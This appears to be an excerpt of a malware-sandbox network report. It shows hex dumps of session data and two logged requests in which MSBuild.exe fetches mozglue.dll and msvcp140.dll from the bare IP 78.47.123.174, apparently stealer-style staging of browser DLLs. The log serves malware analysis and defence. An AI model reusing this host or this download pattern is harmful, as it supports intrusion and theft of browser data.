                                                                                        2024-05-24 08:27:19 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                                        Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                                        2024-05-24 08:27:19 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                                        Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                        2024-05-24 08:27:19 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                        Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                        2024-05-24 08:27:19 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                        Data Ascii: 0<48%8A)$(


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.44975778.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:20 UTC173OUTGET /mozglue.dll HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:21 UTC246INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:21 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 608080
                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                        Connection: close
                                                                                        ETag: "6315a9f4-94750"
                                                                                        Accept-Ranges: bytes
                                                                                        2024-05-24 08:27:21 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                        2024-05-24 08:27:21 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                                        Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                                        2024-05-24 08:27:21 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                                        Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                                        2024-05-24 08:27:21 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                                        Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                                        2024-05-24 08:27:21 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                                        Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                                        2024-05-24 08:27:21 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                                        Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                                        2024-05-24 08:27:21 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                                        Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                                        2024-05-24 08:27:21 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                                        Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                                        2024-05-24 08:27:21 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                                        Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                                        2024-05-24 08:27:21 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                                        Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.44975878.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:22 UTC174OUTGET /msvcp140.dll HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:23 UTC246INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:22 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 450024
                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                        Connection: close
                                                                                        ETag: "6315a9f4-6dde8"
                                                                                        Accept-Ranges: bytes
                                                                                        2024-05-24 08:27:23 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                        2024-05-24 08:27:23 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                                        Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                                                        2024-05-24 08:27:23 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                                        Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                                        2024-05-24 08:27:23 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                                        Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                                        2024-05-24 08:27:23 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                                        Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                                        2024-05-24 08:27:23 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                                        Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
